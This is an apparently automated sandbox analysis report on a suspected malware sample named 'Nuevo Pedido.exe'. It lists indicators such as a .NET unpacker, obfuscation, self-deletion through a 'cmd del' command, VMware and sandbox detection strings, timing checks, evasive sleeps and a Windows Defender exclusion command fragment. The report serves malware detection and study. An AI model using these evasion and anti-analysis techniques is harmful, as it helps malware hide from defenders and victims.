Source: Nuevo Pedido.exe String found in binary or memory: /MethodImplAttribut;component/views/addbook.xaml
Source: Nuevo Pedido.exe String found in binary or memory: views/addbook.baml
Source: Nuevo Pedido.exe String found in binary or memory: /MethodImplAttribut;component/views/addcustomer.xaml
Source: Nuevo Pedido.exe String found in binary or memory: views/addcustomer.baml
Source: Nuevo Pedido.exe String found in binary or memory: a/MethodImplAttribut;component/views/addbook.xamlw/MethodImplAttribut;component/views/borrowfrombookview.xamlm/MethodImplAttribut;component/views/borrowingview.xamlg/MethodImplAttribut;component/views/changebook.xamlo/MethodImplAttribut;component/views/changecustomer.xamlk/MethodImplAttribut;component/views/customerview.xamlo/MethodImplAttribut;component/views/deletecustomer.xamle/MethodImplAttribut;component/views/errorview.xamli/MethodImplAttribut;component/views/smallextras.xamli/MethodImplAttribut;component/views/addcustomer.xaml
Source: Nuevo Pedido.exe String found in binary or memory: *images/booksimage.jpg$views/addbook.baml1J,views/addcustomer.baml
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\Nuevo Pedido.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: Nuevo Pedido.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: Nuevo Pedido.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: cscript.pdbUGP source: Nuevo Pedido.exe, 00000003.00000002.309749696.0000000003460000.00000040.00020000.sdmp, Nuevo Pedido.exe, 00000003.00000002.304821141.0000000001559000.00000004.00000020.sdmp
Source: Binary string: wntdll.pdbUGP source: Nuevo Pedido.exe, 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Nuevo Pedido.exe, 00000003.00000002.308818280.0000000001AAF000.00000040.00000001.sdmp, cscript.exe, 00000010.00000002.506569206.000000000486F000.00000040.00000001.sdmp, cscript.exe, 00000010.00000002.503908034.0000000004750000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: Nuevo Pedido.exe, Nuevo Pedido.exe, 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Nuevo Pedido.exe, 00000003.00000002.308818280.0000000001AAF000.00000040.00000001.sdmp, cscript.exe, cscript.exe, 00000010.00000002.506569206.000000000486F000.00000040.00000001.sdmp, cscript.exe, 00000010.00000002.503908034.0000000004750000.00000040.00000001.sdmp
Source: Binary string: cscript.pdb source: Nuevo Pedido.exe, 00000003.00000002.309749696.0000000003460000.00000040.00020000.sdmp, Nuevo Pedido.exe, 00000003.00000002.304821141.0000000001559000.00000004.00000020.sdmp

Data Obfuscation:

.NET source code contains potential unpacker
Source: Nuevo Pedido.exe, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.2.Nuevo Pedido.exe.a80000.0.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.0.Nuevo Pedido.exe.a80000.0.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 3.0.Nuevo Pedido.exe.de0000.0.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 3.0.Nuevo Pedido.exe.de0000.5.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 3.2.Nuevo Pedido.exe.de0000.1.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 3.0.Nuevo Pedido.exe.de0000.2.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 3.0.Nuevo Pedido.exe.de0000.3.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 3.0.Nuevo Pedido.exe.de0000.7.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 3.0.Nuevo Pedido.exe.de0000.1.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 3.0.Nuevo Pedido.exe.de0000.9.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 0_2_00A892F5 push ds; ret 0_2_00A89340
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 0_2_00A89361 push ds; retf 0_2_00A89364
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 0_2_00A89347 push ds; ret 0_2_00A8934C
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 0_2_056356E0 push esp; iretd 0_2_056356E9
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_0041B822 push eax; ret 3_2_0041B828
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_0041B82B push eax; ret 3_2_0041B892
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_0041B88C push eax; ret 3_2_0041B892
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_004153E6 push ss; iretd 3_2_004153EC
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_0041541E push ss; iretd 3_2_004153EC
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_0041B7D5 push eax; ret 3_2_0041B828
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_00DE92F5 push ds; ret 3_2_00DE9340
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_00DE9347 push ds; ret 3_2_00DE934C
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_00DE9361 push ds; retf 3_2_00DE9364
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A0D0D1 push ecx; ret 3_2_01A0D0E4
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047CD0D1 push ecx; ret 16_2_047CD0E4
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0061B822 push eax; ret 16_2_0061B828
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0061B82B push eax; ret 16_2_0061B892
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0061B88C push eax; ret 16_2_0061B892
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_006153E6 push ss; iretd 16_2_006153EC
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0061541E push ss; iretd 16_2_006153EC
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0061B7D5 push eax; ret 16_2_0061B828
Source: initial sample Static PE information: section name: .text entropy: 7.85660170333

Hooking and other Techniques for Hiding and Protection:

Self deletion via cmd delete
Source: C:\Windows\SysWOW64\cscript.exe Process created: /c del "C:\Users\user\Desktop\Nuevo Pedido.exe"
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cscript.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected AntiVM3
Source: Yara match File source: 0.2.Nuevo Pedido.exe.2dd8e9c.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Nuevo Pedido.exe.2e6b054.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.241689369.0000000002E3A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.241535390.0000000002D71000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Nuevo Pedido.exe PID: 6320, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: Nuevo Pedido.exe, 00000000.00000002.241689369.0000000002E3A000.00000004.00000001.sdmp, Nuevo Pedido.exe, 00000000.00000002.241535390.0000000002D71000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Source: Nuevo Pedido.exe, 00000000.00000002.241689369.0000000002E3A000.00000004.00000001.sdmp, Nuevo Pedido.exe, 00000000.00000002.241535390.0000000002D71000.00000004.00000001.sdmp Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\Nuevo Pedido.exe RDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Nuevo Pedido.exe RDTSC instruction interceptor: First address: 000000000040899E second address: 00000000004089A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cscript.exe RDTSC instruction interceptor: First address: 0000000000608604 second address: 000000000060860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cscript.exe RDTSC instruction interceptor: First address: 000000000060899E second address: 00000000006089A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400 Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400 Thread sleep time: -240000s >= -30000s
Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6404 Thread sleep count: 834 > 30
Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400 Thread sleep time: -239843s >= -30000s
Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6404 Thread sleep count: 1723 > 30
Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6324 Thread sleep time: -32847s >= -30000s
Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400 Thread sleep time: -239717s >= -30000s
Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400 Thread sleep time: -239609s >= -30000s
Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400 Thread sleep time: -239499s >= -30000s
Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400 Thread sleep time: -239390s >= -30000s
Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400 Thread sleep time: -239250s >= -30000s
Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400 Thread sleep time: -239139s >= -30000s
Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400 Thread sleep time: -239015s >= -30000s
Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400 Thread sleep time: -238904s >= -30000s
Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400 Thread sleep time: -238781s >= -30000s
Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400 Thread sleep time: -238671s >= -30000s
Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400 Thread sleep time: -238561s >= -30000s
Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400 Thread sleep time: -238452s >= -30000s
Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400 Thread sleep time: -238343s >= -30000s
Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400 Thread sleep time: -238046s >= -30000s
Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400 Thread sleep time: -237796s >= -30000s
Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400 Thread sleep time: -237437s >= -30000s
Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400 Thread sleep time: -237250s >= -30000s
Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400 Thread sleep time: -236890s >= -30000s
Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400 Thread sleep time: -236781s >= -30000s
Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6348 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\explorer.exe TID: 6388 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\cscript.exe TID: 4140 Thread sleep time: -34000s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\cscript.exe Last function: Thread delayed
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_004088D0 rdtsc 3_2_004088D0
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Thread delayed: delay time: 240000
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Thread delayed: delay time: 239843
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Thread delayed: delay time: 239717
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Thread delayed: delay time: 239609
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Thread delayed: delay time: 239499
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Thread delayed: delay time: 239390
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Thread delayed: delay time: 239250
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Thread delayed: delay time: 239139
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Thread delayed: delay time: 239015
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Thread delayed: delay time: 238904
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Thread delayed: delay time: 238781
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Thread delayed: delay time: 238671
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Thread delayed: delay time: 238561
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Thread delayed: delay time: 238452
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Thread delayed: delay time: 238343
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Thread delayed: delay time: 238046
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Thread delayed: delay time: 237796
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Thread delayed: delay time: 237437
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Thread delayed: delay time: 237250
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Thread delayed: delay time: 236890
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Thread delayed: delay time: 236781
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Window / User API: threadDelayed 834
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Window / User API: threadDelayed 1723
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Thread delayed: delay time: 240000
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Thread delayed: delay time: 239843
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Thread delayed: delay time: 32847
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Thread delayed: delay time: 239717
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Thread delayed: delay time: 239609
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Thread delayed: delay time: 239499
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Thread delayed: delay time: 239390
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Thread delayed: delay time: 239250
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Thread delayed: delay time: 239139
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Thread delayed: delay time: 239015
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Thread delayed: delay time: 238904
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Thread delayed: delay time: 238781
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Thread delayed: delay time: 238671
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Thread delayed: delay time: 238561
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Thread delayed: delay time: 238452
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Thread delayed: delay time: 238343
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Thread delayed: delay time: 238046
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Thread delayed: delay time: 237796
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Thread delayed: delay time: 237437
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Thread delayed: delay time: 237250
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Thread delayed: delay time: 236890
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Thread delayed: delay time: 236781
Source: Nuevo Pedido.exe, 00000000.00000002.241535390.0000000002D71000.00000004.00000001.sdmp Binary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
Source: explorer.exe, 00000005.00000000.290480181.000000000891C000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00dRom0
Source: Nuevo Pedido.exe, 00000000.00000002.241535390.0000000002D71000.00000004.00000001.sdmp Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000005.00000000.290480181.000000000891C000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: Nuevo Pedido.exe, 00000000.00000002.241535390.0000000002D71000.00000004.00000001.sdmp Binary or memory string: vmware
Source: explorer.exe, 00000005.00000000.290974701.0000000008BB0000.00000004.00000001.sdmp Binary or memory string: E#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Vir
Source: explorer.exe, 00000005.00000000.279912891.00000000011B3000.00000004.00000020.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
Source: explorer.exe, 00000005.00000000.251514435.00000000089B5000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
Source: explorer.exe, 00000005.00000000.246577528.00000000053C4000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
Source: explorer.exe, 00000005.00000000.251514435.00000000089B5000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
Source: Nuevo Pedido.exe, 00000000.00000002.241535390.0000000002D71000.00000004.00000001.sdmp Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools

Anti Debugging:

Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_004088D0 rdtsc 3_2_004088D0
Enables debug privileges
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\cscript.exe Process token adjusted: Debug
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A369A6 mov eax, dword ptr fs:[00000030h] 3_2_01A369A6
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019E2990 mov eax, dword ptr fs:[00000030h] 3_2_019E2990
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019EA185 mov eax, dword ptr fs:[00000030h] 3_2_019EA185
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A351BE mov eax, dword ptr fs:[00000030h] 3_2_01A351BE
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A351BE mov eax, dword ptr fs:[00000030h] 3_2_01A351BE
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A351BE mov eax, dword ptr fs:[00000030h] 3_2_01A351BE
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A351BE mov eax, dword ptr fs:[00000030h] 3_2_01A351BE
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019DC182 mov eax, dword ptr fs:[00000030h] 3_2_019DC182
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019E61A0 mov eax, dword ptr fs:[00000030h] 3_2_019E61A0
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019E61A0 mov eax, dword ptr fs:[00000030h] 3_2_019E61A0
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A441E8 mov eax, dword ptr fs:[00000030h] 3_2_01A441E8
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019BB1E1 mov eax, dword ptr fs:[00000030h] 3_2_019BB1E1
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019BB1E1 mov eax, dword ptr fs:[00000030h] 3_2_019BB1E1
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019BB1E1 mov eax, dword ptr fs:[00000030h] 3_2_019BB1E1
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019B9100 mov eax, dword ptr fs:[00000030h] 3_2_019B9100
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019B9100 mov eax, dword ptr fs:[00000030h] 3_2_019B9100
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019B9100 mov eax, dword ptr fs:[00000030h] 3_2_019B9100
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019E513A mov eax, dword ptr fs:[00000030h] 3_2_019E513A
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019E513A mov eax, dword ptr fs:[00000030h] 3_2_019E513A
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019D4120 mov eax, dword ptr fs:[00000030h] 3_2_019D4120
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019D4120 mov eax, dword ptr fs:[00000030h] 3_2_019D4120
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019D4120 mov eax, dword ptr fs:[00000030h] 3_2_019D4120
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019D4120 mov eax, dword ptr fs:[00000030h] 3_2_019D4120
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019D4120 mov ecx, dword ptr fs:[00000030h] 3_2_019D4120
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019DB944 mov eax, dword ptr fs:[00000030h] 3_2_019DB944
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019DB944 mov eax, dword ptr fs:[00000030h] 3_2_019DB944
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019BB171 mov eax, dword ptr fs:[00000030h] 3_2_019BB171
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019BB171 mov eax, dword ptr fs:[00000030h] 3_2_019BB171
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019BC962 mov eax, dword ptr fs:[00000030h] 3_2_019BC962
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019B9080 mov eax, dword ptr fs:[00000030h] 3_2_019B9080
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019EF0BF mov ecx, dword ptr fs:[00000030h] 3_2_019EF0BF
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019EF0BF mov eax, dword ptr fs:[00000030h] 3_2_019EF0BF
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019EF0BF mov eax, dword ptr fs:[00000030h] 3_2_019EF0BF
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A33884 mov eax, dword ptr fs:[00000030h] 3_2_01A33884
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A33884 mov eax, dword ptr fs:[00000030h] 3_2_01A33884
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019F90AF mov eax, dword ptr fs:[00000030h] 3_2_019F90AF
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019E20A0 mov eax, dword ptr fs:[00000030h] 3_2_019E20A0
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019E20A0 mov eax, dword ptr fs:[00000030h] 3_2_019E20A0
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019E20A0 mov eax, dword ptr fs:[00000030h] 3_2_019E20A0
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019E20A0 mov eax, dword ptr fs:[00000030h] 3_2_019E20A0
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019E20A0 mov eax, dword ptr fs:[00000030h] 3_2_019E20A0
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019E20A0 mov eax, dword ptr fs:[00000030h] 3_2_019E20A0
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A4B8D0 mov eax, dword ptr fs:[00000030h] 3_2_01A4B8D0
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A4B8D0 mov ecx, dword ptr fs:[00000030h] 3_2_01A4B8D0
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A4B8D0 mov eax, dword ptr fs:[00000030h] 3_2_01A4B8D0
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A4B8D0 mov eax, dword ptr fs:[00000030h] 3_2_01A4B8D0
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A4B8D0 mov eax, dword ptr fs:[00000030h] 3_2_01A4B8D0
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A4B8D0 mov eax, dword ptr fs:[00000030h] 3_2_01A4B8D0
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019B58EC mov eax, dword ptr fs:[00000030h] 3_2_019B58EC
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019E002D mov eax, dword ptr fs:[00000030h] 3_2_019E002D
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019E002D mov eax, dword ptr fs:[00000030h] 3_2_019E002D
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019E002D mov eax, dword ptr fs:[00000030h] 3_2_019E002D
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019E002D mov eax, dword ptr fs:[00000030h] 3_2_019E002D
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019E002D mov eax, dword ptr fs:[00000030h] 3_2_019E002D
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A37016 mov eax, dword ptr fs:[00000030h] 3_2_01A37016
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A37016 mov eax, dword ptr fs:[00000030h] 3_2_01A37016
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A37016 mov eax, dword ptr fs:[00000030h] 3_2_01A37016
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019CB02A mov eax, dword ptr fs:[00000030h] 3_2_019CB02A
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019CB02A mov eax, dword ptr fs:[00000030h] 3_2_019CB02A
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019CB02A mov eax, dword ptr fs:[00000030h] 3_2_019CB02A
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019CB02A mov eax, dword ptr fs:[00000030h] 3_2_019CB02A
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A84015 mov eax, dword ptr fs:[00000030h] 3_2_01A84015
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A84015 mov eax, dword ptr fs:[00000030h] 3_2_01A84015
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019D0050 mov eax, dword ptr fs:[00000030h] 3_2_019D0050
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019D0050 mov eax, dword ptr fs:[00000030h] 3_2_019D0050
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A72073 mov eax, dword ptr fs:[00000030h] 3_2_01A72073
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A81074 mov eax, dword ptr fs:[00000030h] 3_2_01A81074
